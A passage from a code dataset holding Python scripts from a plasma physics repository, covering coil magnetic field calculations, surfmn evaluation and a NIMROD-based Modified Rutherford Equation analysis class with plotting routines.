np.cos(phi*self.nPert)\n theta = self.coil_theta[ipcoil] * 2.0 * np.pi\n \n r0 = self.rmag_axis + self.distance_coil * np.cos(theta)\n z0 = self.zmag_axis + self.distance_coil * np.sin(theta)\n x0 = r0 * np.cos(phi)\n y0 = r0 * np.sin(phi)\n tx = 0.0 \n ty = self.coil_tilt[ipcoil] * 2.0 * np.pi\n tz = phi\n\n thisCoil = cc.coil(thisCurrent,self.segmentsPerCoil)\n thisCoil.planarCoil(x0,y0,z0,self.coil_r,tx,ty,tz)\n self.coilList[ipcoil].append(thisCoil)\n\n for iNode in range(self.nodeXYZ.shape[1]):\n print(\"Calculating node: \" + str(iNode))\n for iPhi in range(self.nodeXYZ.shape[2]):\n print(\"Calculating plane: \" + str(iPhi))\n sys.stdout.flush()\n bXYZ=np.zeros(3)\n for ipcoil in range(self.npCoil):\n for iCoil in self.coilList[ipcoil]:\n bXYZ[:]+=bs.intCoil(iCoil,self.nodeXYZ[:,iNode,iPhi])\n phi = 2.0*np.pi*iPhi/self.phiPlanes\n ### transform to bRZPhi\n # bRZPhi accounts for the negative in Bphi due to rzphi coordinates\n self.coilBRZPhi[0,iNode,iPhi,ipcoil] = bXYZ[0]*np.cos(phi)+bXYZ[1]*np.sin(phi)\n self.coilBRZPhi[1,iNode,iPhi,ipcoil] = bXYZ[2]\n self.coilBRZPhi[2,iNode,iPhi,ipcoil] = bXYZ[0]*np.sin(phi)-bXYZ[1]*np.cos(phi)\n\n\n\n def coil_calc(self,coil_currents):\n bRZPhi=np.zeros([self.coilBRZPhi.shape[0],self.coilBRZPhi.shape[1],self.coilBRZPhi.shape[2]])\n bRPhase = np.zeros(1,dtype=np.complex_)\n bZPhase = np.zeros(1,dtype=np.complex_)\n bPhiPhase = np.zeros(1,dtype=np.complex_)\n for ipcoil, icur in enumerate(coil_currents):\n bRZPhi[:,:,:] += self.coilBRZPhi[:,:,:,ipcoil]*icur\n bRPhase=np.fft.fft(bRZPhi[0,:,:],axis=1)/(float(self.phiPlanes))\n bZPhase=np.fft.fft(bRZPhi[1,:,:],axis=1)/(float(self.phiPlanes))\n bPhiPhase=np.fft.fft(bRZPhi[2,:,:],axis=1)/(float(self.phiPlanes))\n\n### write brmp files\n if (self.phiPlanes % 2 == 0): #even\n maxnphi = int(self.phiPlanes/2)\n else: #odd\n maxnphi = int((self.phiPlanes+1)/2)\n for ii in range (maxnphi +1):\n if ii==maxnphi:\n fac=0.5\n else:\n fac=1.0\n tempFileName = self.filePath + self.baseFileName +\"{0:0=2d}\".format(ii) + self.fileExt\n thisFile = open(tempFileName,'w')\n for jj in range(bRPhase.shape[0]):\n thisLine ='{: 16.16e}'.format(fac*bRPhase[jj,ii].real) + \", \" \n thisLine+='{: 16.16e}'.format(fac*bRPhase[jj,ii].imag) + \", \"\n thisLine+='{: 16.16e}'.format(fac*bZPhase[jj,ii].real) + \", \" \n thisLine+='{: 16.16e}'.format(fac*bZPhase[jj,ii].imag) + \", \"\n thisLine+='{: 16.16e}'.format(fac*bPhiPhase[jj,ii].real) + \", \" \n thisLine+='{: 16.16e}'.format(fac*bPhiPhase[jj,ii].imag) + \"\\n\"\n thisFile.write(thisLine)\n thisFile.close()\n\ndef surfmn_eval(fileName):\n profNames = ['Vprime','q']\n with h5py.File(fileName,'r') as fc:\n for aname, avalue in fc.attrs.items():\n print(aname,avalue)\n mrGrid = fc['surfmnGrid'][:]\n bmn = fc['Bmn001'][:]\n rho = fc['rho'][:]\n profs = fc['prof'][:]\n print(fc.keys())\n \n#prof 1 is q\n fq = interp1d(profs[1,:],rho)\n rho_2 = fq(-2.)\n rho_3 = fq(-3)\n rho_4 = fq(-4)\n rho_5 = fq(-4)\n\n# print(rho_2,rho_3,rho_4)\n bmn1=interp1d(mrGrid[1,:,1],bmn[:,9])\n bmn2=interp1d(mrGrid[1,:,1],bmn[:,8])\n bmn3=interp1d(mrGrid[1,:,1],bmn[:,7])\n bmn4=interp1d(mrGrid[1,:,1],bmn[:,6])\n bmn5=interp1d(mrGrid[1,:,1],bmn[:,5])\n bres1=bmn1(rho_2) #evaluamte m=1 at rho=2 surface\n bres2=bmn2(rho_2)\n bres3=bmn3(rho_3) \n bres4=bmn4(rho_4)\n bres5=bmn5(rho_5)\n\n# print(bres1,bres2,bres3,bres4)\n small2=(1.0e-10**2)\n value=(bres1**2 + bres3**2 + bres4**2 + bres5**2)/(bres2**2+small2)\n return value" }, { "alpha_fraction": 0.49308452010154724, "alphanum_fraction": 0.5135382413864136, "avg_line_length": 32.782447814941406, "blob_id": "6200428f255145e426972dc50c218a7005047a92", "content_id": "e3d3a50c4c4771b8684a8bf16df02af7fdf35316", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27330, "license_type": "no_license", "max_line_length": 148, "num_lines": 809, "path": "/mre_analysis/mre_step.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"Modified Rutherford Equation Analysis Script\n\nThis script performs a Modified Rutherford Equation analysis using\nthe supplied nimrod dumpfile.\n\"\"\"\n\n\nimport eval_nimrod as eval\nimport fsa\nimport plot_nimrod as pn\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport h5py\nimport numpy as np\nimport pickle\nimport nim_timer as timer\nfrom scipy.interpolate import interp1d\n\n\nclass MreStep:\n \"\"\"\n A class used to represent a nimrod time step for MRE analysis\n\n ...\n\n Attributes\n ----------\n _dumpfile : str\n Nimrod dumpfile name\n _nimrodin : str\n Nimrod input file name (nimrod.in)\n _time : float\n Time of this time slice (seconds)\n _step : int\n Step number of this time slice\n _eval : EvalNimrod\n Instance of eval nimrod class\n Methods\n -------\n dump(self, file)\n Pickles data to file\n load(self, file)\n Reads pickled data from file\n read_dumptime(self)\n Read time and step from dumpfile\n get_time(self):\n Returns time and step\n interpolate_fsa(self, radial = 'rhon', npts = 200, fsa = True)\n Creates interpolate of surface quantitites\n get_r_of_q(self, qvalue)\n Find the radial location of qvalue\n \"\"\"\n\n def __init__(self, dumpfile, nimrodin):\n \"\"\"\n Parameters\n ----------\n dumpfile : str\n Dumpfile name\n nimrodin : str\n Nimrod input file name (nimrod.in)\n \"\"\"\n\n self._dumpfile = dumpfile\n self._nimrodin = nimrodin\n self._time = None\n self._step = None\n self._eval = None\n self.grid = None\n self.fsa_power = {}\n self.dvar_dict = {}\n \n\n def dump(self, file):\n \"\"\"Writes data to a pickle file.\n\n Parameters\n ----------\n file : str\n Pickle file name to write to\n \"\"\"\n\n pickle.dump(self._dumpfile, file)\n pickle.dump(self._nimrodin, file)\n pickle.dump(self._time, file)\n pickle.dump(self._step, file)\n pickle.dump(self.nmodes, file)\n pickle.dump(self.nmax, file)\n pickle.dump(self.nphi, file)\n pickle.dump(self.phimax, file)\n pickle.dump(self.fsa_power, file)\n pickle.dump(self.dvar_dict, file)\n\n\n def load(self, file):\n \"\"\"Reads from a pickle file.\n\n Parameters\n ----------\n file : str\n Pickle file to read\n \"\"\"\n\n with open(file,'rb') as pickle_file:\n self._dumpfile = pickle.load(pickle_file)\n self._nimrodin = pickle.load(pickle_file)\n self._time = pickle.load(pickle_file)\n self._step = pickle.load(pickle_file)\n self.nmodes = pickle.load(pickle_file)\n self.nmax = pickle.load(pickle_file)\n self.nphi = pickle.load(pickle_file)\n self.phimax = pickle.load(pickle_file)\n self.fsa_power = pickle.load(pickle_file)\n self.dvar_dict = pickle.load(pickle_file)\n\n def read_dumptime(self):\n '''Read time and step from nimrod dumpfile\n \n Raises \n ------\n IOError\n If there is a problem reading the dumpfile\n '''\n\n with h5py.File(self._dumpfile, 'r') as h5file:\n try:\n self._time=h5file[\"dumpTime\"].attrs['vsTime']\n self._step=int(h5file[\"dumpTime\"].attrs['vsStep'])\n except:\n print(f\"Error reading time or step in {self._dumpfile}\")\n raise IOError\n\n def get_time(self):\n '''Returns time and step \n \n Returns\n -------\n float \n Time of current time slice\n int \n Step number of current time slice\n '''\n \n if self._time == None or self._step == None:\n self.read_dumptime\n return self._time, self._step\n\n def interpolate_fsa(self, radial = 'rhon', npts = 200, fsa = True):\n \"\"\"Create interpolates of surface quantities as functions of\n the specified radial coordinate\n\n Parameters\n ----------\n radial : str, optional\n The name of the radial coordinate (default = rhon)\n npts : int, optional\n Number of points in interpolate (default = 200)\n fsa : bool, optional\n If true, normalize by v' (default = True)\n\n Raises \n ------\n KeyError\n If radial is not a reconized radial coordinate name \n \"\"\"\n\n RADIUS_TITLE = {\n 'rhon':r\"$\\rho_N$\",\n 'phi':r\"$\\Phi$\",\n 'psin':r\"$\\psi_N$\",\n 'psi':r\"$\\psi$\",\n }\n\n try:\n r_varable = self.dvar_dict[radial]\n except:\n print(f\"Radial variable {radial} is not reconized\")\n raise KeyError\n #use Radius Title to set default r_label\n self.r_label = RADIUS_TITLE.get(radial,radial)\n print(self.r_label)\n rmin=np.min(r_varable)\n rmax=np.max(r_varable)\n self.r = np.linspace(rmin,rmax,1000,endpoint=True)\n self.dvar_interp = {}\n self.fsa_interp = {}\n if fsa:\n fac = 1.0\n else:\n fac = np.abs(self.dvar_dict['vprime'])\n\n for key, item in self.dvar_dict.items():\n self.dvar_interp[key] = interp1d(r_varable, item,\n kind = 'cubic')(self.r)\n for key, item in self.fsa_power.items():\n self.fsa_interp[key] = interp1d(r_varable, item * fac,\n kind = 'cubic')(self.r)\n self.r_of_q = interp1d(self.dvar_dict['q'], r_varable,\n kind = 'cubic', fill_value = \"extrapolate\")\n\n def get_r_of_q(self, qvalue):\n \"\"\"Find the radial location of the input q value\n \n Parameters\n ----------\n qvalue : float\n The value of q \n\n Returns\n -------\n float\n The radial location of qvalue\n\n Raises\n ------\n ValueError\n If the input q value can not be found\n \"\"\"\n\n try:\n return self.r_of_q(qvalue)\n except:\n print(f\"The safety factor {qvalue} is not it the domain\")\n raise ValueError\n\n\n def set_evalnimrod(self):\n ''' Set up EvalNimrod instance '''\n\n # full fields is nvbtjpd\n # n is useful for testing, b is needed\n MRE_FIELDS = 'nb'\n if self._eval is None:\n self._eval = eval.EvalNimrod(self._dumpfile,\n fieldlist = MRE_FIELDS)\n return None\n\n @timer.timer_func\n def get_b(self, rzn, flag, abort=False):\n \"\"\"Evaluate b at a given point\n \n Parameters\n ----------\n rzn : np.ndarray\n Location of evaluation\n flag : integer\n If 0 only use eq, if 1 add n=0 to eq\n abort : bool\n Flag to raise an exception if true and can't find b\n\n Returns\n -------\n Real np.array\n Value of b at location\n\n Raises\n ------\n Exception\n If abort is false, and location is outside domain \n \"\"\"\n\n b = self._eval.eval_field('b', rzn, dmode=0)\n b0 = np.real(b[:])\n if (abort and np.isnan(b0).any()):\n print(b)\n raise Exception('get_b: Hit wall')\n return b0\n\n @timer.timer_func\n def find_pf_null(self, rzn, flag=0):\n \"\"\"Find a poloidal field null\n \n Parameters\n ----------\n rzn : np.ndarray\n Initial guess for poloidal field null\n flag : int \n If 0 only use b_eq, if 1 add b(n=0) to b_eq\n\n Returns\n -------\n np.ndarray\n RZ locations of pf null if succesful\n\n Raises\n ------\n Exception\n If cannot converge of a fixed point \n \"\"\"\n\n rzn = np.array(rzn)\n MAXSTEPS = 1000\n RTOL = 1.e-8\n it = 0\n drz0 = 0.125 * rzn[0]\n while True:\n b = self.get_b(rzn, flag, abort = False)\n norm0 = np.sqrt(b[0]**2 + b[1]**2)\n rvn = -rzn[0] * b[1] / norm0\n zvn = rzn[0] * b[0] / norm0\n drz = drz0 * (1.0 - float(it) / MAXSTEPS) + RTOL * rzn[0]\n while True:\n rr = rzn[0] + rvn * drz\n zz = rzn[1] + zvn * drz\n rzng = np.array([rr, zz, 0.0])\n b = self.get_b(rzng, flag, abort=False)\n if not np.isnan(b).any():\n norm = np.sqrt(b[0]**2 + b[1]**2)\n if (norm < norm0):\n rzn[:] = rzng[:]\n break\n rr = rzn[0] - rvn * drz\n zz = rzn[1] - zvn * drz\n rzng=np.array([rr, zz, 0.0])\n b = self.get_b(rzng, flag, abort=False)\n if not np.isnan(b).any():\n norm = np.sqrt(b[0]**2 + b[1]**2)\n if (norm < norm0):\n rzn[:] = rzng[:]\n break\n drz= drz / 2.0\n if (drz / rzn[0] < RTOL):\n return rzn # done\n it += 1\n if it >= MAXSTEPS:\n raise Exception('FSA find_pf_null: No convergence')\n return None\n\n @timer.timer_func\n def mre_surf_int(self, rzc, y, dy, evalnimrod, fargs):\n \"\"\"Integrand for flux surface integrates for MRE analysis \n\n Parameters\n ----------\n rzc : np.array of length 3\n Current RZC location\n y : np.array \n Vector storing current values of y\n dy : np.array\n Vector storing current values of dy\n evalnimrod : evalnimrod \n Instancation of evalnimrod class to evaluate fields at RZC\n fargs : dict\n Dictionary of additional arguments (kw does not work here)\n\n Returns\n -------\n np.array\n Upadated dy with mre specific datum\n \"\"\"\n\n addpert=fargs.get(\"addpert\",True)\n grid=self.set_fsagrid(rzc[0],rzc[1])\n# self.fields.clean_up_fsa()\n# self.fields.powerFlux(grid)\n# self.fields.advectPowerFlux(grid)\n\n # dy[0-3] are used\n fac = fargs['sfac']\n minidx = fargs['nmin']\n idx = 4\n\n# for key, item in self.fields.powerFluxDict.items():\n# dy[idx:idx+self.nmodes]=(fac*item[minidx:minidx+self.nmodes] + 1.0)*dy[2]\n# idx += self.nmodes\n# for key, item in self.fields.advectDict.items():\n# dy[idx:idx+self.nmodes]=(fac*item[minidx:minidx+self.nmodes] + 1.0)*dy[2]\n# idx += self.nmodes\n return dy\n\n @timer.timer_func\n def mre_analysis(self, eq_flag=0):\n \"\"\"Main routine for performing MRE analysis\n\n Parameters\n ----------\n eq_flag : int\n Use eq fields if 0, use eq + n=0 fields if 1 \n \"\"\"\n self.set_evalnimrod()\n rzo = np.array([1.76821,-0.0188439,0.0])\n o_point = self.find_pf_null(rzo, flag=eq_flag)\n b0 = self.get_b(o_point, eq_flag, abort = True)\n print(o_point, b0)\n r0 = o_point[0]\n bt0 = b0[2]\n print(r0, bt0)\n pass\n\n##### ignore below the point\n def set_2dgrid(self,start,stop,npts,debug=0):\n '''sets up a 2d grid, using non to determine the number of phi planes\n based on\n '''\n p1 = np.array([start[0], start[1], 0.0])\n p2 = np.array([stop[0], stop[1], 0.0])\n p3 = np.array([start[0], start[1], self.phimax])\n rzp2d = pn.PlotNimrod.grid_2d_gen(p1, p2, p3, npts,self.nphi)\n# self.fields.grid=eval.EvalGrid(rzp2d)\n# self.fields.grid.set_debug(debug)\n\n @staticmethod\n def calc_nmodes(lphi):\n nmodes=int(2**lphi/3)+1\n return nmodes\n\n @staticmethod\n def calc_nplanes(lphi):\n nplanes = 2**lphi\n return nplanes\n\n def set_phiplanes(self):\n self.nmodes = self.calc_nmodes(self.lphi)\n self.nmax = self.nmodes-1\n self.nphi = self.calc_nplanes(self.lphi)\n self.phimax = np.pi*2*(self.nphi-1)/self.nphi\n\n\n def set_fsagrid(self,r,z):\n rzp = np.array([np.broadcast_to(r,self.nphi),\n np.broadcast_to(z,self.nphi),\n np.linspace(0,self.phimax,self.nphi)])\n return rzp\n\n\n def find_comp_boundary(self,inpoint,outpoint,tol=1e-8,debug=False):\n index=0\n maxit=100\n ntest=self._eval.eval_field('n', outpoint, dmode = 0, eq = 1)\n if ntest == ntest:\n '''return if outpoint is in domain'''\n return outpoint\n fst=np.copy(inpoint)\n lst=np.copy(outpoint)\n if debug:\n print(fst,inpoint)\n print(lst,outpoint)\n dist=np.linalg.norm(lst-fst,2)\n if dist<tol:\n return fst\n while True:\n tst=(fst+lst)/2.0\n if debug:\n print(tst)\n ntest=self._eval.eval_field('n',tst,dmode=0,eq=1)\n if ntest ==ntest:\n fst=tst\n else:\n lst=tst\n dist=np.linalg.norm(lst-fst,2)\n if debug:\n print(dist)\n if dist<tol:\n break\n index+=1\n if index>maxit:\n print(\"no convergence\")\n break\n if debug:\n print(fst)\n print(lst)\n return fst\n\n\n\n \n\n\n @timer.timer_func\n def calculate_power_fsa(self,rzo=None,rzx=None,nsurf=100,eqflag=0,fargs={},**kwargs):\n# self.fields.set_method(\"powerflux\")\n\n dpow=kwargs.get('dpow',0.5)\n nmax = kwargs.get('nmax',5)\n rzo=np.array([1.76821,-0.0188439,0.0])\n oPoint=self.find_pf_null(rzo, flag=0)\n rzx=np.array([1.27,-1.14,0.0])\n xPoint=self.find_pf_null(rzx, flag=0)\n #find rmax\n rzmax=np.copy(oPoint)\n rzmax[0]=3.0\n rzmax=self.find_comp_boundary(oPoint,rzmax)\n #self.set_2dgrid(oPoint,rzmax,npts)\n print('rzmax',rzmax)\n\n\n self.fsa=True\n fargs['rtol']=1.e-8\n fargs['sfac']=1.e-2\n fargs['nmin']=1\n fargs['nmax']=5\n self.nmodes=nmax-fargs['nmin']+1\n self.nmax=nmax\n\n #to check nmax < nmodes\n #\n\n#skip q integration\n# dvar, yvar, contours = fsa.FSA(self.fields.eval, rzo, self.dummy_fsa, 1, \\\n# nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, \\\n# fargs=fargs)\n\n# iend=-1\n# while np.isnan(yvar[:,iend]).any():\n# iend -= 1\n# iend += yvar.shape[1]+1\n# #unevaluated interpoate\n# self.qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic',fill_value=\"extrapolate\")\n\n\n #call induction at opoint to get number of fields\n# self.fields.clean_up_fsa()\n# self.fields.powerFlux(grid=self.set_fsagrid(*rzo[0:2]))\n# self.fields.advectPowerFlux(grid=self.set_fsagrid(*rzo[0:2]))\n\n neq=0\n# neq += len(self.fields.powerFluxDict) * self.nmodes\n# neq += len(self.fields.advectDict) * self.nmodes\n# self.fields.clean_up_fsa()\n\n# dvar,yvar,contours = fsa.FSA(self.fields.eval, rzo, self.power_fsa_int, neq, \\\n# nsurf=nsurf,depvar='eta', dpow=dpow, flag=eqflag, normalize=False,\\\n# **fargs)\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n\n #dvars\n self.dvar_dict={}\n self.dvar_dict['psin']=dvar[0,:iend]\n self.dvar_dict['rhon']=dvar[1,:iend]\n self.dvar_dict['psi']=dvar[2,:iend]\n self.dvar_dict['phi']=dvar[3,:iend] #\"toroidal flux\"\n self.dvar_dict['vprime']=dvar[6,:iend]\n self.dvar_dict['q']=dvar[7,:iend]\n\n idx=0\n self.fsa_power = {}\n# for key in self.fields.powerFluxDict:\n# self.fsa_power[key] = \\\n# (yvar[idx:idx+self.nmodes,:iend] - dvar[6,:iend]) / \\\n# (fargs['sfac'] * dvar[6,:iend])\n# idx += self.nmodes\n# for key in self.fields.advectDict:\n# self.fsa_power[key] = \\\n# (yvar[idx:idx+self.nmodes,:iend] - dvar[6,:iend]) / \\\n# (fargs['sfac'] * dvar[6,:iend])\n# idx += self.nmodes\n\n\n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n\n # self.raw_bcmn=bcmn\n # self.raw_bsmn=bsmn\n # self.raw_bmn_amp=bmn_amp\n # self.raw_bmn_phase =bmn_phase\n\n # self.interpolate_fsa()\n\n # neq=1+nterm*self.nfour*(4*self.mmax+1)\n # fig = plt.figure(figsize=(10,8))\n # ax=fig.add_subplot(111)\n # conf=plt.plot(self.rhon,self.q)\n # plt.show()\n\n # fig =plt.figure(figsize=(10,8))\n # ax=fig.add_subplot(111)\n # conf=plt.plot(self.rhon,self.bmn_amp[0,2,:])\n # plt.show()\n\n # fig =plt.figure(figsize=(10,8))\n # ax=fig.add_subplot(111)\n # conf=plt.plot(self.rhon,self.bmn_phase[0,2,:])\n # plt.show()\n\n return None\n\n def default_plot(self, fig_size = [8,6],qlist=None):\n\n DEFAULT_q = [-1.2, -1.5, -2, -3, -4]\n if not qlist:\n qlist = DEFAULT_q\n\n lin_power=self.fsa_interp['vxbeq'] + \\\n self.fsa_interp['jxbeq'] + \\\n self.fsa_interp['ngpp']\n qua_power=self.fsa_interp['vxbn0'] + self.fsa_interp['jxbn0']\n non_power=self.fsa_interp['vxbp'] + self.fsa_interp['jxbp']\n ohm_power=self.fsa_interp['etajp']\n visc_power=self.fsa_interp['divpip']\n neoi_power=self.fsa_interp['divPii']\n neoe_power=self.fsa_interp['divPie']\n poyn_power=self.fsa_interp['poynting']\n adv_power=self.fsa_interp['rhovdveq'] + \\\n self.fsa_interp['rhovdvn0'] + \\\n self.fsa_interp['rhovdvp']\n\n try:\n poyndis_power = self.fsa_interp['poyndis']\n poynlin_power = self.fsa_interp['poynlin']\n poynqln_power = self.fsa_interp['poynqln']\n poynnon_power = self.fsa_interp['poynnon']\n except:\n pass\n total_power = np.zeros_like(adv_power)\n skip_list = ['poyndis', 'poynlin', 'poynqln', 'poynnon']\n for key, item in self.fsa_interp.items():\n if key not in skip_list:\n total_power+=item\n\n #total_power -= self.fsa_interp['divpip']\n diss_power = ohm_power + neoi_power + neoe_power+ visc_power\n\n ## DEBUG:\n #print(np.max(self.dvar_dict['phi']))\n #print(np.min(self.dvar_dict['phi']))\n #fig, ax = plt.subplots(figsize=fig_size)\n #ax.plot(self.dvar_dict['phi'],marker='+')\n #plt.show()\n ##return\n\n y_label = r\"$\\Omega_n$ [MW/m^3]\"\n y_label = r\"$\\Omega_n$ [MW/m]\"\n xlim = [0,0.85]\n max_idx = -1\n while np.max(self.r[:max_idx])>0.9:\n max_idx -= 1\n\n nmin = self.nmax+1 -self.nmodes\n nlist = range(nmin,self.nmax+1)\n for idx,nn in enumerate(nlist):\n fig, ax = plt.subplots(figsize=fig_size)\n\n ax.plot(self.r[:max_idx], total_power[idx,:max_idx]/10**6, alpha=0.7, label=\"Total\",color='tab:brown')\n ax.plot(self.r[:max_idx], lin_power[idx,:max_idx]/10**6, alpha=0.7, label=\"Lin\",color='tab:orange')\n ax.plot(self.r[:max_idx], qua_power[idx,:max_idx]/10**6, alpha=0.7, label=\"QL\",color ='tab:green')\n ax.plot(self.r[:max_idx], non_power[idx,:max_idx]/10**6, alpha=0.7, label=\"NL\",color='tab:red')\n ax.plot(self.r[:max_idx], diss_power[idx,:max_idx]/10**6, alpha=0.7, label=\"Diss\",color='tab:purple')\n ax.plot(self.r[:max_idx], poyn_power[idx,:max_idx]/10**6, alpha=0.7, label=\"PF\",color='tab:blue')\n\n\n title = f\"n={nn} power at {self._time*1000:.2f}ms\"\n\n for q in qlist:\n print(q)\n try:\n rq = self.get_r_of_q(q)\n print(rq)\n ax.axvline(rq,ls=':')\n except:\n print(\"could not find q\")\n pass\n plt.legend(ncol=2, loc='upper left', fontsize = 18, frameon=True, framealpha=0.8,handlelength=1)\n\n ax.set(xlabel=self.r_label, ylabel=y_label, title=title, xlim=xlim)\n\n plt.axhline(0,color='k')\n #ax.ticklabel_format(axis='both', style='sci', scilimits=(10**3,10**-3),\n # useOffset=None, useLocale=None, useMathText=True)\n\n plt.tight_layout()\n plt.show()\n### plot 2\n for idx,nn in enumerate(nlist):\n fig, ax = plt.subplots(figsize=fig_size)\n\n ax.plot(self.r[:max_idx], total_power[idx,:max_idx]/10**6, alpha=0.7, label=\"Total\",color='tab:brown')\n #ax.plot(self.r[:max_idx], (lin_power[idx,:max_idx]+poynlin_power[idx,:max_idx])/10**6, alpha=0.7, label=\"Lin+LPF\",color='tab:orange')\n #ax.plot(self.r[:max_idx], (qua_power[idx,:max_idx]+poynqln_power[idx,:max_idx])/10**6, alpha=0.7, label=\"QL+QPF\",color ='tab:green')\n ax.plot(self.r[:max_idx], (non_power[idx,:max_idx])/10**6, alpha=0.7, label=\"NL\",color='tab:red')\n #ax.plot(self.r[:max_idx], (diss_power[idx,:max_idx]+poyndis_power[idx,:max_idx])/10**6, alpha=0.7, label=\"Diss+DPF\",color='tab:purple')\n #ax.plot(self.r[:max_idx], poyn_power[idx,:max_idx]/10**6, alpha=0.7, label=\"PF\",color='tab:blue')\n\n\n title = f\"n={nn} power at {self._time*1000:.2f}ms\"\n qlist2 = [-1.2,-4/3, -1.5,-5/3, -2, -3, -4]\n c2list = ['tab:blue','tab:red','tab:blue','tab:red','tab:blue','tab:blue','tab:blue']\n idx =0\n for q in qlist2:\n print(q)\n try:\n rq = self.get_r_of_q(q)\n print(rq)\n ax.axvline(rq,ls=':',color = c2list[idx])\n idx+=1\n except:\n print(\"could not find q\")\n pass\n plt.legend(ncol=1, loc='upper left', fontsize = 18, frameon=True, framealpha=0.8,handlelength=1)\n ax.set(xlabel=self.r_label, ylabel=y_label, title=title, xlim=xlim)\n\n\n #ax.ticklabel_format(axis='both', style='sci', scilimits=(10**3,10**-3),\n # useOffset=None, useLocale=None, useMathText=True)\n plt.axhline(0,color='k')\n plt.tight_layout()\n plt.show()\n#plot 2b\n for idx,nn in enumerate(nlist):\n fig, ax = plt.subplots(figsize=fig_size)\n\n ax.plot(self.r[:max_idx], total_power[idx,:max_idx]/10**6, alpha=0.7, label=\"Total\",color='tab:brown')\n ax.plot(self.r[:max_idx], (lin_power[idx,:max_idx]+poyn_power[idx,:max_idx])/10**6, alpha=0.7, label=\"Lin+PF\",color='tab:orange')\n ax.plot(self.r[:max_idx], (qua_power[idx,:max_idx])/10**6, alpha=0.7, label=\"QL\",color ='tab:green')\n ax.plot(self.r[:max_idx], (non_power[idx,:max_idx])/10**6, alpha=0.7, label=\"NL\",color='tab:red')\n ax.plot(self.r[:max_idx], (diss_power[idx,:max_idx])/10**6, alpha=0.7, label=\"Diss\",color='tab:purple')\n# ax.plot(self.r[:max_idx], poyn_power[idx,:max_idx]/10**6, alpha=0.7, label=\"PF\",color='tab:blue')\n\n\n title = f\"n={nn} power at {self._time*1000:.2f}ms\"\n qlist2 = [-1.2,-4/3, -1.5,-5/3, -2, -3, -4]\n c2list = ['tab:blue','tab:red','tab:blue','tab:red','tab:blue','tab:blue','tab:blue']\n idx =0\n for q in qlist2:\n print(q)\n try:\n rq = self.get_r_of_q(q)\n print(rq)\n ax.axvline(rq,ls=':',color = c2list[idx])\n idx+=1\n except:\n print(\"could not find q\")\n pass\n plt.legend(ncol=1, loc='upper left', fontsize = 18, frameon=True, framealpha=0.8,handlelength=1)\n\n ax.set(xlabel=self.r_label, ylabel=y_label, title=title, xlim=xlim)\n\n\n #ax.ticklabel_format(axis='both', style='sci', scilimits=(10**3,10**-3),\n # useOffset=None, useLocale=None, useMathText=True)\n plt.axhline(0,color='k')\n plt.tight_layout()\n plt.show()\n#plot 3\n for idx,nn in enumerate(nlist):\n fig, ax = plt.subplots(figsize=fig_size)\n\n ax.plot(self.r[:max_idx], (lin_power[idx,:max_idx]+poynlin_power[idx,:max_idx])/10**6, alpha=0.7, label=\"lin+poy\")\n ax.plot(self.r[:max_idx], qua_power[idx,:max_idx]/10**6, alpha=0.7, label=\"qlin\")\n ax.plot(self.r[:max_idx], (non_power[idx,:max_idx])/10**6, alpha=0.7, label=\"non\")\n ax.plot(self.r[:max_idx], (non_power[idx,:max_idx]+poynnon_power[idx,:max_idx])/10**6, alpha=0.7, label=\"non+poy\")\n ax.plot(self.r[:max_idx], diss_power[idx,:max_idx]/10**6, alpha=0.7, label=\"diss\")\n ax.plot(self.r[:max_idx], total_power[idx,:max_idx]/10**6, alpha=0.7, label=\"tot\")\n\n\n title = f\"n={nn} power at {self._time*1000:.2f}ms\"\n\n for q in qlist:\n print(q)\n try:\n rq = self.get_r_of_q(q)\n print(rq)\n ax.axvline(rq,ls=':')\n except:\n print(\"could not find q\")\n pass\n ax.legend(loc='best',ncol=2)\n\n ax.set(xlabel=self.r_label, ylabel=y_label, xlim=xlim, title=title)\n\n\n #ax.ticklabel_format(axis='both', style='sci', scilimits=(10**3,10**-3),\n # useOffset=None, useLocale=None, useMathText=True)\n\n plt.tight_layout()\n plt.show()\n\n for idx,nn in enumerate(nlist):\n fig, ax = plt.subplots(figsize=fig_size)\n\n ax.plot(self.r[:max_idx], visc_power[idx,:max_idx]/10**6, alpha=0.7, label=\"visc\")\n ax.plot(self.r[:max_idx], neoe_power[idx,:max_idx]/10**6, alpha=0.7, label=\"neoe\")\n ax.plot(self.r[:max_idx], neoi_power[idx,:max_idx]/10**6, alpha=0.7, label=\"neoi\")\n ax.plot(self.r[:max_idx], ohm_power[idx,:max_idx]/10**6, alpha=0.7, label=\"ohm\")\n #ax.plot(self.r[:max_idx], adv_power[idx,:max_idx]/10**6, alpha=0.7, label=\"adv\")\n\n\n title = f\"n={nn} power at {self._time*1000:.2f}ms\"\n\n for q in qlist:\n print(q)\n try:\n rq = self.get_r_of_q(q)\n print(rq)\n ax.axvline(rq,ls=':')\n except:\n print(\"could not find q\")\n pass\n ax.legend(loc='best',ncol=2)\n\n ax.set(xlabel=self.r_label, ylabel=y_label, xlim=xlim, title=title)\n\n\n #ax.ticklabel_format(axis='both', style='sci', scilimits=(10**3,10**-3),\n # useOffset=None, useLocale=None, useMathText=True)\n\n plt.tight_layout()\n plt.show()\n\n\n return\n def clean_up(self):\n ''' Clean up fields to reduce memory foot print'''\n# self.fields.clean_up()\n self.grid=None\n" }, { "alpha_fraction": 0.6320388317108154, "alphanum_fraction": 0.6611650586128235, "avg_line_length": 22.953489303588867, "blob_id": "d1566d36733a400add3ad6a5b4cbe5ddd9c7066a", "content_id": "b2caad11ced0167b179b4e1f614617f9c306883d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1030, "license_type": "no_license", "max_line_length": 66, "num_lines": 43, "path": "/trip2Nim/write_probe_points.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\n\n\nimport os\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\n\n\n\nhomeDir = os.environ['HOME']\nscratchDir = homeDir + 